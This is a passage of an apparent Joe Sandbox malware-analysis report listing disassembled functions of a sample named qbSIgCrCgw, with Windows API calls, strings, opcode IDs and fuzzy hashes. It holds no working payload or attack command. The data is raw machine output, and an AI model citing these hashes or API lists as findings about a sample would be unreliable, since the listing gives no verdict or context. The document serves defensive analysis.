                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                • String ID:
                                                                                • API String ID: 641708696-0
                                                                                • Opcode ID: e1299f5efd3da8ac088c51584275d90e72782280497559df1d9f18b39d8cd7d9
                                                                                • Instruction ID: 3f2c2c4cf1f6e09cd23ffd2941bc68f3251c51cd9b8285251bcc04fbaf9b8f68
                                                                                • Opcode Fuzzy Hash: e1299f5efd3da8ac088c51584275d90e72782280497559df1d9f18b39d8cd7d9
                                                                                • Instruction Fuzzy Hash: 67616C30901710DFDB269F18E98AB26B7B5FF94715F15452EE48686A70C774ACD0CB88
                                                                                APIs
                                                                                  • Part of subcall function 003CB526: GetWindowLongW.USER32(?,000000EB), ref: 003CB537
                                                                                • GetSysColor.USER32(0000000F), ref: 003CB438
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ColorLongWindow
                                                                                • String ID:
                                                                                • API String ID: 259745315-0
                                                                                • Opcode ID: 2ca06b85f2c80e9bb3524c8a694e199a038524c5b66482bfff5e69566d7e3141
                                                                                • Instruction ID: c0e003e82d64ab7b72fa5244bdff7e21251f3974729614012007c60f65d127e4
                                                                                • Opcode Fuzzy Hash: 2ca06b85f2c80e9bb3524c8a694e199a038524c5b66482bfff5e69566d7e3141
                                                                                • Instruction Fuzzy Hash: 2A41F031504110AFCF266F28E88AFB97B66AB06730F198269FD65CE1E6C7318C41DB25
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                • String ID:
                                                                                • API String ID: 136442275-0
                                                                                • Opcode ID: 933d1a3536697c4a81e69d9920b947626e55859d8c01329ac0555ddadf74dc60
                                                                                • Instruction ID: 30e51fdd2719a7db8ce1963ed0514d9dd1b6692982536a23757a028f077f2aca
                                                                                • Opcode Fuzzy Hash: 933d1a3536697c4a81e69d9920b947626e55859d8c01329ac0555ddadf74dc60
                                                                                • Instruction Fuzzy Hash: 9E413BB784511CAECF66EB90DC42DDB73BDEB44300F0041A3B649AA141EB70ABE88F50
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(0044DC00,0044DC00,0044DC00), ref: 003FD7CE
                                                                                • GetDriveTypeW.KERNEL32(?,00463A70,00000061), ref: 003FD898
                                                                                • _wcscpy.LIBCMT ref: 003FD8C2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: BuffCharDriveLowerType_wcscpy
                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                • API String ID: 2820617543-1000479233
                                                                                • Opcode ID: 14cd0d3e4131fdae34c19b91eca5cf5292f0e8c911cdf5fd6270244f18c8c0ce
                                                                                • Instruction ID: 0c4cec042be1b9418b88367ca5483f99f816d9df828807e06b919b7194e31cc2
                                                                                • Opcode Fuzzy Hash: 14cd0d3e4131fdae34c19b91eca5cf5292f0e8c911cdf5fd6270244f18c8c0ce
                                                                                • Instruction Fuzzy Hash: 7A5182311042449FC712EF14D896BAFB7A6EF84354F10892EF6995B2A2DB71ED05CB42
                                                                                APIs
                                                                                • __swprintf.LIBCMT ref: 003B93AB
                                                                                • __itow.LIBCMT ref: 003B93DF
                                                                                  • Part of subcall function 003D1557: _xtow@16.LIBCMT ref: 003D1578
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: __itow__swprintf_xtow@16
                                                                                • String ID: %.15g$0x%p$False$True
                                                                                • API String ID: 1502193981-2263619337
                                                                                • Opcode ID: 3b9820ba59e7aac15476933f42c6011d4e3828bfc17ec4fa5d19f0cc7a72a81a
                                                                                • Instruction ID: 17548867772ecfe4759f38127b87c658d2d142dde8086f48b36f75017c0adfb1
                                                                                • Opcode Fuzzy Hash: 3b9820ba59e7aac15476933f42c6011d4e3828bfc17ec4fa5d19f0cc7a72a81a
                                                                                • Instruction Fuzzy Hash: 0141F936604214AFDB25DF79E941FAAB3E8EF85304F20446FE249DB681EA35DA41CB14
                                                                                APIs
                                                                                • MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0041A259
                                                                                • CreateCompatibleDC.GDI32(00000000), ref: 0041A260
                                                                                • SendMessageW.USER32(?,00000173,00000000,00000000), ref: 0041A273
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0041A27B
                                                                                • GetPixel.GDI32(00000000,00000000,00000000), ref: 0041A286
                                                                                • DeleteDC.GDI32(00000000), ref: 0041A28F
                                                                                • GetWindowLongW.USER32(?,000000EC), ref: 0041A299
                                                                                • SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 0041A2AD
                                                                                • DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 0041A2B9
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
                                                                                • String ID: static
                                                                                • API String ID: 2559357485-2160076837
                                                                                • Opcode ID: 52ca1843c408ecd86ee8f2a1fa91ecdf0a2299e4fc03cccc5bb2d13dbaa0fc6e
                                                                                • Instruction ID: e18b0bb293ea9f8818c16414c1939c1d045fa623b9d4bdb0b754c8f5d07d10d0
                                                                                • Opcode Fuzzy Hash: 52ca1843c408ecd86ee8f2a1fa91ecdf0a2299e4fc03cccc5bb2d13dbaa0fc6e
                                                                                • Instruction Fuzzy Hash: B1318D31501214ABDF115FA4EC49FEB3B69FF0D364F110225FA29A62A0C739D861DBA9
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: _wcscpy$CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                                                                • String ID: 0.0.0.0
                                                                                • API String ID: 2620052-3771769585
                                                                                • Opcode ID: 3e7f9a67351d65d2c074151be6cbed52b8ee70de17d5abbf11187697978cddac
                                                                                • Instruction ID: 12cc72df99c8b1949272646f0352c8433c480046b9e3e655511833cc32c0b950
                                                                                • Opcode Fuzzy Hash: 3e7f9a67351d65d2c074151be6cbed52b8ee70de17d5abbf11187697978cddac
                                                                                • Instruction Fuzzy Hash: 6F110A72904219AFCB2AAB70BC4AEEA77ACDF40710F010176F245DA181EF70DE818754
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003D5047
                                                                                  • Part of subcall function 003D7C0E: __getptd_noexit.LIBCMT ref: 003D7C0E
                                                                                • __gmtime64_s.LIBCMT ref: 003D50E0
                                                                                • __gmtime64_s.LIBCMT ref: 003D5116
                                                                                • __gmtime64_s.LIBCMT ref: 003D5133
                                                                                • __allrem.LIBCMT ref: 003D5189
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D51A5
                                                                                • __allrem.LIBCMT ref: 003D51BC
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D51DA
                                                                                • __allrem.LIBCMT ref: 003D51F1
                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 003D520F
                                                                                • __invoke_watson.LIBCMT ref: 003D5280
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                • String ID:
                                                                                • API String ID: 384356119-0
                                                                                • Opcode ID: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                • Instruction ID: 30a761e1611924396b5b57e0827ece1f9843367b7c777e56f0ffa2244682cbda
                                                                                • Opcode Fuzzy Hash: d5e017027a87c5018ad803d53256558374d4b82fb585307daa6d96de3ac92c4c
                                                                                • Instruction Fuzzy Hash: B071D473E01B16ABE716AE79DC42B6AB3A8AF10764F15462BF410DA7C1E770DD408BD0
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 003F4DF8
                                                                                • GetMenuItemInfoW.USER32(00471708,000000FF,00000000,00000030), ref: 003F4E59
                                                                                • SetMenuItemInfoW.USER32(00471708,00000004,00000000,00000030), ref: 003F4E8F
                                                                                • Sleep.KERNEL32(000001F4), ref: 003F4EA1
                                                                                • GetMenuItemCount.USER32(?), ref: 003F4EE5
                                                                                • GetMenuItemID.USER32(?,00000000), ref: 003F4F01
                                                                                • GetMenuItemID.USER32(?,-00000001), ref: 003F4F2B
                                                                                • GetMenuItemID.USER32(?,?), ref: 003F4F70
                                                                                • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 003F4FB6
                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003F4FCA
                                                                                • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 003F4FEB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                • String ID:
                                                                                • API String ID: 4176008265-0
                                                                                • Opcode ID: 47e2e4cd0422de10e61e0a01a4c9a5b7de6ca479eff83e8965f2e123e61d9bc6
                                                                                • Instruction ID: 1bac1ba8674c506759df63458ec0310ffba7a0b740b83be4bd621d6fdb34ac75
                                                                                • Opcode Fuzzy Hash: 47e2e4cd0422de10e61e0a01a4c9a5b7de6ca479eff83e8965f2e123e61d9bc6
                                                                                • Instruction Fuzzy Hash: 2A617C7590038DAFDB22CFA8D888ABF7BB8FB45318F150159F646A7261D731AD45CB20
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00419C98
                                                                                • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00419C9B
                                                                                • GetWindowLongW.USER32(?,000000F0), ref: 00419CBF
                                                                                • _memset.LIBCMT ref: 00419CD0
                                                                                • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00419CE2
                                                                                • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00419D5A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$LongWindow_memset
                                                                                • String ID:
                                                                                • API String ID: 830647256-0
                                                                                • Opcode ID: 40a22030c4cef7597bae6b6d8c9639c5b3e21d836e834dd2822da45ab446d756
                                                                                • Instruction ID: 7f12b4d6139fb2147bd4ef6eaf5821306cd7274fccd345b81ede0b97b99b3648
                                                                                • Opcode Fuzzy Hash: 40a22030c4cef7597bae6b6d8c9639c5b3e21d836e834dd2822da45ab446d756
                                                                                • Instruction Fuzzy Hash: A0618D75900208AFDB11CFA8DC81EEE77B8EB09704F14416AFA08A73A1D774AD82DB54
                                                                                APIs
                                                                                • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 003E94FE
                                                                                • SafeArrayAllocData.OLEAUT32(?), ref: 003E9549
                                                                                • VariantInit.OLEAUT32(?), ref: 003E955B
                                                                                • SafeArrayAccessData.OLEAUT32(?,?), ref: 003E957B
                                                                                • VariantCopy.OLEAUT32(?,?), ref: 003E95BE
                                                                                • SafeArrayUnaccessData.OLEAUT32(?), ref: 003E95D2
                                                                                • VariantClear.OLEAUT32(?), ref: 003E95E7
                                                                                • SafeArrayDestroyData.OLEAUT32(?), ref: 003E95F4
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003E95FD
                                                                                • VariantClear.OLEAUT32(?), ref: 003E960F
                                                                                • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 003E961A
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                • String ID:
                                                                                • API String ID: 2706829360-0
                                                                                • Opcode ID: 3e6b30fde21489759e61e818f266ccb4baf2368cd7ca2e1053e704d288bfffa0
                                                                                • Instruction ID: 1e8757d60dd519aeba13b09bbab62c77e3765fd84cd8182aaf2c02328c3388ed
                                                                                • Opcode Fuzzy Hash: 3e6b30fde21489759e61e818f266ccb4baf2368cd7ca2e1053e704d288bfffa0
                                                                                • Instruction Fuzzy Hash: 2D415F71D00229AFCB02DFA5DC44ADEBB79FF18354F00806AF511A72A1DB31EA45CBA4
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearInit$_memset
                                                                                • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h?F$|?F
                                                                                • API String ID: 2862541840-156164444
                                                                                • Opcode ID: 63f71e65fb6427306f282899a7d0bfb52c44a6dcd7b65e802102a2d81e1573cd
                                                                                • Instruction ID: 5c27298f53a1f7693f9867327a268b84e78e87ff68b955b83a319773e466ca0c
                                                                                • Opcode Fuzzy Hash: 63f71e65fb6427306f282899a7d0bfb52c44a6dcd7b65e802102a2d81e1573cd
                                                                                • Instruction Fuzzy Hash: CD91AF71A04219ABDF24CFA4D844FAFB7B8EF85710F10856AF515BB280D7789941CFA8
                                                                                APIs
                                                                                  • Part of subcall function 003B936C: __swprintf.LIBCMT ref: 003B93AB
                                                                                  • Part of subcall function 003B936C: __itow.LIBCMT ref: 003B93DF
                                                                                • CoInitialize.OLE32 ref: 0040ADF6
                                                                                • CoUninitialize.OLE32 ref: 0040AE01
                                                                                • CoCreateInstance.OLE32(?,00000000,00000017,0043D8FC,?), ref: 0040AE61
                                                                                • IIDFromString.OLE32(?,?), ref: 0040AED4
                                                                                • VariantInit.OLEAUT32(?), ref: 0040AF6E
                                                                                • VariantClear.OLEAUT32(?), ref: 0040AFCF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                • API String ID: 834269672-1287834457
                                                                                • Opcode ID: c3d3aeba2d29eef19bc653df90231264d1bb065c98004ad14655ea780a21ebbd
                                                                                • Instruction ID: f2eea27a340ec07a10896417d37f92f15afbd6c12d4520038447ca0d1edf36b1
                                                                                • Opcode Fuzzy Hash: c3d3aeba2d29eef19bc653df90231264d1bb065c98004ad14655ea780a21ebbd
                                                                                • Instruction Fuzzy Hash: A561AD716083119FC711EF64D848B6BB7E8AF48704F10442AF985AB2D1C778ED59CB9B
                                                                                APIs
                                                                                • WSAStartup.WSOCK32(00000101,?), ref: 00408168
                                                                                • inet_addr.WSOCK32(?,?,?), ref: 004081AD
                                                                                • gethostbyname.WSOCK32(?), ref: 004081B9
                                                                                • IcmpCreateFile.IPHLPAPI ref: 004081C7
                                                                                • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00408237
                                                                                • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 0040824D
                                                                                • IcmpCloseHandle.IPHLPAPI(00000000), ref: 004082C2
                                                                                • WSACleanup.WSOCK32 ref: 004082C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                • String ID: Ping
                                                                                • API String ID: 1028309954-2246546115
                                                                                • Opcode ID: 81588cb0c55642b73aecdf72211c030ce9282c6ca6ed4d4198e7fa5764ecd8c7
                                                                                • Instruction ID: bb86ef4b2a54cbfbc7e72d8dafdce535ae1745499ed0b1bb70616b4dbd45c21d
                                                                                • Opcode Fuzzy Hash: 81588cb0c55642b73aecdf72211c030ce9282c6ca6ed4d4198e7fa5764ecd8c7
                                                                                • Instruction Fuzzy Hash: C4518F316047009FD711AF24DE45B6AB7E5AF48310F04886EFA95EB2E1DB74E901CB4A
                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000001), ref: 003FE396
                                                                                • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 003FE40C
                                                                                • GetLastError.KERNEL32 ref: 003FE416
                                                                                • SetErrorMode.KERNEL32(00000000,READY), ref: 003FE483
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Error$Mode$DiskFreeLastSpace
                                                                                • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                • API String ID: 4194297153-14809454
                                                                                • Opcode ID: f8825f9ef0535d60ad7bf1f039b06224ddb1ec48fa7cb5b20d2081b148962772
                                                                                • Instruction ID: 20de5e25f563722518b7ccca7f0d1b8a9143ca004a75ecf3052507f725beaf1d
                                                                                • Opcode Fuzzy Hash: f8825f9ef0535d60ad7bf1f039b06224ddb1ec48fa7cb5b20d2081b148962772
                                                                                • Instruction Fuzzy Hash: A8319436A0020D9FDB02EF65D845FBDB7B4EF44304F14806AF615AB2A1DB749A01C791
                                                                                APIs
                                                                                • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 003EB98C
                                                                                • GetDlgCtrlID.USER32 ref: 003EB997
                                                                                • GetParent.USER32 ref: 003EB9B3
                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 003EB9B6
                                                                                • GetDlgCtrlID.USER32(?), ref: 003EB9BF
                                                                                • GetParent.USER32(?), ref: 003EB9DB
                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 003EB9DE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmp
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CtrlParent
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 1383977212-1403004172
